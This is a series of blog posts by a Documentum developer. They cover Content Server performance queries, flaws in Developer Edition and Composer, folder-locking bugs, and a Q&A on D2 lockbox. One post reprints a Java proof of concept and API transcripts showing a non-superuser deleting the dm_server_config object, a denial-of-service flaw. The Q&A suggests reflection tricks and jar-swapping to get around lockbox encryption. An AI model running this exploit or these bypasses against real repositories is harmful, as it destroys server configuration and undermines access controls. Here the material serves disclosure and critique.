What happens when smart guy does not sit back

Previously I posted about performance challenge related to a lot of fetches from docbase, there I have described what makes SysObjFullFetch RPC command extremely slow – a set of useless SQL queries:

-- determine object type by r_object_id
SELECT dm_dbalias_B.I_TYPE
  FROM DMI_OBJECT_TYPE dm_dbalias_B
 WHERE dm_dbalias_B.R_OBJECT_ID = :dmb_handle
 
-- retrieve data from database
  SELECT *
    FROM TYPE_RV dm_dbalias_B, TYPE_SV dm_dbalias_C
   WHERE (    dm_dbalias_C.R_OBJECT_ID = :dmb_handle
          AND dm_dbalias_C.R_OBJECT_ID = dm_dbalias_B.R_OBJECT_ID)
ORDER BY dm_dbalias_B.R_OBJECT_ID, dm_dbalias_B.I_POSITION
 
-- get identifier of object's ACL (totally useless)
SELECT dm_dbalias_B.R_OBJECT_ID
  FROM DM_ACL_S dm_dbalias_B
 WHERE (dm_dbalias_B.OWNER_NAME = :p00 
    AND dm_dbalias_B.OBJECT_NAME = :p01)
 
-- retrieve object's ACL
SELECT *
    FROM DM_ACL_RV dm_dbalias_B, DM_ACL_SV dm_dbalias_C
   WHERE (    dm_dbalias_C.R_OBJECT_ID = :dmb_handle
          AND dm_dbalias_C.R_OBJECT_ID = dm_dbalias_B.R_OBJECT_ID)
ORDER BY dm_dbalias_B.R_OBJECT_ID, dm_dbalias_B.I_POSITION
 
-- check whether ACL is actual or not (totally useless)
SELECT dm_dbalias_B.R_OBJECT_ID
  FROM DM_ACL_S dm_dbalias_B
 WHERE (    dm_dbalias_B.R_OBJECT_ID = :dmb_objectp
        AND dm_dbalias_B.I_VSTAMP = :dmb_versionp)

Let me clarify why I do think so.
This query:

-- get identifier of object's ACL (totally useless)
SELECT dm_dbalias_B.R_OBJECT_ID
  FROM DM_ACL_S dm_dbalias_B
 WHERE (dm_dbalias_B.OWNER_NAME = :p00 
    AND dm_dbalias_B.OBJECT_NAME = :p01)

is completely useless because technically we do not need r_object_id of ACL to retrieve ACL from database in follow-up query:

-- retrieve object's ACL
SELECT *
    FROM DM_ACL_RV dm_dbalias_B, DM_ACL_SV dm_dbalias_C
   WHERE (    dm_dbalias_C.R_OBJECT_ID = :dmb_handle
          AND dm_dbalias_C.R_OBJECT_ID = dm_dbalias_B.R_OBJECT_ID)
ORDER BY dm_dbalias_B.R_OBJECT_ID, dm_dbalias_B.I_POSITION

so, we can replace two queries by the single one:

SELECT *
    FROM DM_ACL_RV dm_dbalias_B, DM_ACL_SV dm_dbalias_C
   WHERE (    dm_dbalias_C.OWNER_NAME = :p00 
          AND dm_dbalias_C.OBJECT_NAME = :p01
          AND dm_dbalias_C.R_OBJECT_ID = dm_dbalias_B.R_OBJECT_ID)
ORDER BY dm_dbalias_B.R_OBJECT_ID, dm_dbalias_B.I_POSITION

Moreover, in some set of cases we do not need to check ACLs at all, these cases are:

  • current user is a superuser or a member of dm_browse_all (dm_read_all, etc) group, or current user is a sysobject’s owner
  • sysobject has r_is_public=T or world_permit>=2 and MACL is turned off:

It had taken about 3 months to force EMC to change something in Content Server to improve performance (frankly speaking EMC employees had no idea about r_is_public and world_permit attributes), and finally we have following notice in patch notes:

Below is a comparison of single thread performance (amount of fetches per 10 seconds) between old and new implementation for case when sysobject has r_is_public=T (I believe that orange graph’s laydown is related to GC settings):

Developer “PostgreSQL” edition fun

18 months ago EMC released an extremely buggy version of Documentum Content Server intended for development purposes, some of ECN members perfectly described the situation with it:

and EMC’s reaction for such critics was extremely eloquent (I do believe that nobody likes critics, but ignoring real problems perfectly describes your respectfulness to the customers):

Three weeks ago new version of Developer Edition got appeared on EMC’s ftp server:

What we should expect from new version?

  • Networking issues are still not resolved (it is weird because I already mentioned a good receipt for that – it also must be accomplished by following shell scenario:
    cd /etc/udev/rules.d
    rm -f 70-persistent-net.rules
    rm -f 75-persistent-net-generator.rules
    echo "# " > 75-persistent-net-generator.rules

    ):

  • EMC decided to use weird lockbox feature, quote from readme file:

    4. Run dm_crypto_create and dm_crypto_boot utilities to enable Lockbox.
    ———————————————————————-
    4.1 Execute dm_crypto_create utility as below:
    dm_crypto_create -lockbox lockbox.lb -lockboxpassphrase Password@123 -keyname
    aek.key -passphrase Password@123 -check

    4.2 Run dm_crypto_boot utility as below:
    dm_crypto_boot -all
    Provide the key store passphrase as “Password@123” when prompted.

    , i.e. now you will need to run

    dm_crypto_boot -all -lockbox lockbox.lb \
     -lockboxpassphrase Password@123 -passphrase Password@123

    upon every reboot

  • xPlore still does not work:
  • there is still no reliable installer
  • and the real gem is EMC disclosed their regression tests (check /opt/Suites directory) – now you can get a real progress on developer edition πŸ™‚

Q & A. X

Q:

Hi,
I am trying to write a standalone DF/D2 program. I create a DFC session and then make it in D2 context by D2Session.initTBO. I think perform normal DFC set, save operation on a sysobject. When I try to apply a D2 configuration like D2AuditConfig.apply I get the below error How to correct this??

ERROR 1 – D2 lockbox file or D2Method.passphrase property within it could not be found.
Exception in thread β€œmain” DfException:: THREAD: main; MSG: Impossible to decrypt the method server response; ERRORCODE: ff; NEXT: null
at com.emc.d2.api.methods.D2Method.start(D2Method.java:417)

A:

You have two options:

  • put and setup all Lockbox stuff onto client side
  • Take advantage of reflection:
    Field ticketField = D2Session.class.getField("s_ticket");
    ticketField.setAccessible(true);
    Map tickets = (Map) ticketField.get(null);
    tickets.put("docbase_name", "dmadmin_password");
    

Q:

Also, cant it disable Lockbox altogether in 7.2+D24.5 environment?

A:

Download latest (or m.b. previous to latest or so) service pack for D2 4.2, extract com.emc.common.java.crypto.AESCrypto class from C6-Common-4.2.0.jar, insert it into C6-Common-4.5.0.jar.

Have you read latest ESA?

On August 6 EMC announced 6 security fixes for Content Server:

being the authorresearcher of the first five (I believe EMC found the last one in another blog) vulnerabilities I will shed light on them very soon, however I can’t understand what CS versions was remediated – it seems that version numbers were received from /dev/random:

Fighting with Composer

More than eight years ago EMC released the first version of “very promising” application for packaging and deploying Documentum artifacts – Documentum Composer, intended to kill Documentum Application Builder/Installer. Unfortunately, even after eight years this “promising application” is suitable neither for development nor for installation routines. Really, if you try find some early descriptions of Documentum Composer, for example: Introduction to Documentum Composer, – you will find that nothing has been changed since 6.0SP1 version, EMC bumps version numbers, but Composer still not able to do elementary things, for example, when I try to remove artifact from project I get a weird warning:

What the fuck is “other artifacts”, how can I find them? Open my preferred filemanager and try to find them manually? What a shame! How can I manually modify xml files? Edit via text editor (yeah, some folks think that if application uses XML to store data this means that application uses open format)? Bullshit! How can I edit this:

? It seems that EMC coders has never heard before about UTF-8 encoding and CDATA section in XML! Installation process is tedious as well, interesting, has anybody at EMC heard about java.io.tmpdir system property

or about file names in ZIP specification:

? I believe the answer is “no”. Ultimately, due to a lot of glitches in this “promising application” all experienced Documentum developers try to minimize the amount of interactions with Documentum Composer, the usage pattern varies from one developer to another, the most common patters are:

  • don’t use composer at all – developers write a set of API/DQL/dmbasic scripts and store them in VCS, this approach is extremely straightforward, but it typically requires two kinds sets: one for clean installation and another one for upgrading between application versions
  • use composer to transfer application between environments – developers perform changes in DEV environment using API/DQL/dmbasic scripts, after that they import Documentum artifacts into Composer

I prefer the second option because it is too boring to support two sets of scripts. But this approach has a couple of disadvantages:

  • I need to properly setup composer workspace on CI side, i.e. I need to unpack composer distribution, create empty workspace, create empty dummy project to force composer to create “DocumentumCoreProject” (yeah, Composer does not create DocumentumCoreProject automatically when you try to import project into empty workspace) and delete dummy project, after that the build scenario may look like (extremely error-prone!):
    • Delete composer project from workspace
    • Copy composer project from VCS to workspace
    • Register (import) composer project in workspace
    • Perform some updates in project (like replacing jar files)
    • Build project (or workspace)
  • Sometimes, depending on a target environment, it is required to set upgrade option (i.e. ignore, version or override) for certain artifacts – “manually” editing and committing default.dardef file is not an option

There is an interesting fact related to the first problem: composer does allow to import “external” projects into workspace:

but corresponding “emc.importProject” ant task does not – it requires project to be copied into workspace:

In order to resolve both problems mentioned above I developed a simple eclipse plugin, and now my ant scenario looks like:

<?xml version="1.0"?>
<project name="composer" default="all">

  <property file="${basedir}/src/main/resources/build.properties"/>

  <taskdef name="ap.importProject" classname="tel.panfilov.documentum.composer.ImportProjectAntTask"/>
  <taskdef name="ap.setUpgradeOption" classname="tel.panfilov.documentum.composer.SetUpgradeOptionAntTask"/>

  <target name="create-workspace" description="Create composer workspace">
    <ap.importProject project="<project name>" location="${composer.project.dir}"/>
    <ap.setUpgradeOption project="<project name>">
       <upgradeOptions>
          <artifact name="*" category="com.emc.ide.artifact.bpm.processContainer" value="IGNORE"/>
          <artifact name="wt_executing" category="com.emc.ide.artifact.bpm.processContainer" value="VERSION"/>
       </upgradeOptions>
    </ap.setUpgradeOption>
  </target>

  <target name="build-workspace" description="build eclipse project">
    <eclipse.incrementalBuild kind="full"/>
  </target>

  <target name="clean-workspace" description="clean eclipse project">
    <eclipse.incrementalBuild kind="clean"/>
  </target>

  <target name="all" depends="create-workspace, clean-workspace, build-workspace"/>

</project>

Trap for negligent developer

Do you remember my last quote “if you blindly apply everything that is written here without further research you are bloody idiot“? It seems that EMC coders again get caught in this stupid trap. A half year ago I published a couple of post about deny of service in Content Server and demonstrated how deny of service could evolve into privilege elevation, here these posts: Is it possible to compromise Documentum by deleting object? Part I, Is it possible to compromise Documentum by deleting object? Typical mistakes and Is it possible to compromise Documentum by deleting object? Solution. Let’s review to the DoS PoC, here it is:

/**
 * @author Andrey B. Panfilov <andrew@panfilov.tel>
 */
public class Test {
 
    public static void main(String[] argv) throws Exception {
        String docbase = argv[0];
        String userName = argv[1];
        String password = argv[2];
        IDfSession session = null;
        try {
            session = new DfClient().newSession(docbase, new DfLoginInfo(
                    userName, password));
 
            IDfUser user = session.getUser(null);
 
            if (user.isSuperUser() || user.isSystemAdmin()) {
                System.out.println("User " + userName
                        + " has too wide privileges, choose different one");
                System.exit(0);
            }
 
            Set<String> saveMethods = new LinkedHashSet<String>();
            for (Object o : TypeMechanics.getAllInstances()) {
                saveMethods.add(((TypeMechanics) o).getExpungeMethod());
            }
            for (String method : saveMethods) {
                System.out.println(method + "\tis "
                        + (checkDmServerConfig(session, method) ? "" : "not ")
                        + "vulnerable for dm_server_config objects");
            }
        } finally {
            if (session != null) {
                session.disconnect();
            }
        }
    }
 
    public static Boolean checkDmServerConfig(IDfSession session, String method)
        throws DfException {
        try {
            session.beginTrans();
            IDfPersistentObject object = (IDfPersistentObject) session
                    .getServerConfig();
            object.revert();
            IDfList params = new DfList(new String[] {"OBJECT_TYPE",
                "i_vstamp", });
            IDfList types = new DfList(new String[] {"S", "I", });
            IDfList values = new DfList(
                    new String[] {object.getType().getName(),
                        String.valueOf(object.getVStamp()), });
            try {
                session.apply(object.getObjectId().getId(), method, params,
                        types, values);
            } catch (DfException ex) {
                return false;
            }
            try {
                object.revert();
            } catch (DfException ex) {
                return true;
            }
            return false;
        } catch (DfException ex) {
            return false;
        } finally {
            session.abortTrans();
        }
    }
 
}

What makes this code smelly? I believe this code smells a lot, but one thing makes it terribly smelly – exception handling:

            try {
                session.apply(object.getObjectId().getId(), method, params,
                        types, values);
            } catch (DfException ex) {
                return false;
            }

There is a special cauldron in the Hell for programmers who handle exceptions like me. Let’s check a couple of commands manually…

Connected to Documentum Server running Release 7.2.0020.0177  Linux64.Oracle
Session id is s0
API> begintran,c,
...
OK
API> retrieve,c,dm_server_config where object_name='TEST'
...
3d024be980000102
API> apply,c,3d024be980000102,dmScopeConfigExpunge
...
q0
API> ?,c,q0
result
------------
F
(1 row affected)
[DM_DATA_DICT_E_SCOPE_CONFIG_CANT_FETCH]error:  
     "Cannot fetch - Invalid object ID '3d024be980000102'."

[DM_OBJ_MGR_E_FETCH_BAD_TYPE]error:  
     "attempt to create object of type  failed because type did not exist"


API> revert,c,3d024be980000102
...
OK
API> apply,c,3d024be980000102,dmDisplayConfigExpunge
...
q0
API> ?,c,q0
result
------------
F
(1 row affected)
[DM_DATA_DICT_E_DISPLAY_CONFIG_CANT_FETCH]error:  
       "Cannot fetch - Invalid object ID '3d024be980000102'."

[DM_OBJ_MGR_E_FETCH_BAD_TYPE]error:  
        "attempt to create object of type  failed because type did not exist"


API> revert,c,3d024be980000102
...
OK

Keep going…

API> apply,c,3d024be980000102,DROP_STAMP
...
q0
API> ?,c,q0
result
------------
F
(1 row affected)
[DM_OBJ_MGR_E_DELETE_MISMATCH]error:  
     "version mismatch on delete of object 3d024be980000102: version supplied was 0"

[DM_OBJ_MGR_E_FETCH_FAIL]error:  
      "attempt to fetch object with handle 3d024be980000102 failed"


API> revert,c,3d024be980000102
...
[DM_API_E_EXIST]error:  
      "Document/object specified by 3d024be980000102 does not exist."

[DM_SYSOBJECT_E_CANT_FETCH_INVALID_ID]error:  
      "Cannot fetch a sysobject - Invalid object ID : 3d024be980000102"

[DM_OBJ_MGR_E_FETCH_FAIL]error:  
      "attempt to fetch object with handle 3d024be980000102 failed"

WTF? Continuing…

API> apply,c,3d024be980000102,DROP_DUMP
...
q0
API> ?,c,q0
result
------------
F
(1 row affected)
[DM_DUMP_E_OPEN_TRANSACTION]error:  
      "The destroy Dump operation cannot be executed while 
      inside of a user transaction."

API> abort,c
...
OK
API> apply,c,3d024be980000102,DROP_DUMP
...
q0
API> ?,c,q0
result
------------
T
(1 row affected)

API> revert,c,3d024be980000102
...
[DM_API_E_EXIST]error:  
      "Document/object specified by 3d024be980000102 does not exist."

[DM_SYSOBJECT_E_CANT_FETCH_INVALID_ID]error:  
      "Cannot fetch a sysobject - Invalid object ID : 3d024be980000102"

LOL πŸ™‚

DM_FOLDER_E_CONCUR_LINK_OPERATION_FAILURE

It seems that Content Server 7.2 got a new weird behavior – now if you perform create/update/delete operations with dm_folder objects in transaction you may get one of DM_FOLDER_E_CONCUR_LINK_OPERATION_FAILURE, DM_FOLDER_E_CONCUR_UNLINK_OPERATION_FAILURE or DM_FOLDER_E_CONCUR_RENAME_OPERATION_FAILURE error:

--
-- Session #1
--
API> begintran,c,
...
OK
API> create,c,dm_folder
...
0b024be98000a900
API> set,c,l,object_name
SET> folder 1
...
OK
API> save,c,l
...
OK

--
-- Session #2
--
API> begintran,c,
...
OK
API> create,c,dm_folder
...
0b024be98000a90b
API> set,c,l,object_name
SET> folder 2
...
OK
API> save,c,l
...
-- 10 sec timeout
[DM_FOLDER_E_CONCUR_LINK_OPERATION_FAILURE]error:  
      "Cannot perfrom the link operation on folder (0b024be98000a90b), 
      as some concurrent operation is being performed on the folder or 
      decendant folder or ancesstor folder with folder id 0c024be980000105."


API> commit,c,
...
[DM_SESSION_E_TRANSACTION_ERROR]error:  
      "Transaction invalid due to errors, please abort transaction."

it seems that new behavior originates from following bugs/CRs addressed in 7.2 (check release notes):

Issue Number Description
CS-46175 r_link_cnt on folder is not showing the correct numbers of objects held by the folder.
CS-40838 When two users perform a move operation of two folders simultaneously, the r_folder_path and i_ancestor_id parameters contain incorrect values causing folder inconsistencies in Oracle and SQL Server. Workaround: Add disable_folder_synchronization = T in the server.ini file. By default, the value is F.

The interesting thing here is a fact, that new behavior has nothing in common with consistency – EMC developers are not familiar with the common lock pattern:

  if (condition) {
    acquire lock
    if (condition) {
      do work
    }
    release lock
  }

and make mistakes that even junior developers do not make:

--
-- Session #1
--
API> create,c,dm_folder
...
0b024be98000c2dc
API> set,c,l,object_name
SET> test_folder
...
OK
API> link,c,l,/dmadmin
...
OK
API> link,c,l,/Temp
...
OK
API> link,c,l,/System
...
OK
API> save,c,l
...
OK

--
-- Session #2
--
API> begintran,c,
...
OK
API> create,c,dm_folder
...
0b024be98000c2e8
API> set,c,l,object_name
SET> f1
...
OK
API> link,c,l,/dmadmin/test_folder
...
OK
API> save,c,l
...
OK

--
-- Session #1
--
API> destroy,c,l
... waiting

--
-- Session #2
--
API> commit,c,
...
OK

--
-- Session #1
-- 
OK

--
-- Session #2
-- here we get zombie folder
--
API> get,c,0b024be98000c2e8,r_folder_path[0]
...
/dmadmin/test_folder/f1
API> retrieve,c,dm_folder where any r_folder_path='/dmadmin/test_folder'
...
[DM_API_E_NO_MATCH]error:  
    "There was no match in the docbase for the qualification: 
    dm_folder where any r_folder_path='/dmadmin/test_folder'"

What a shame!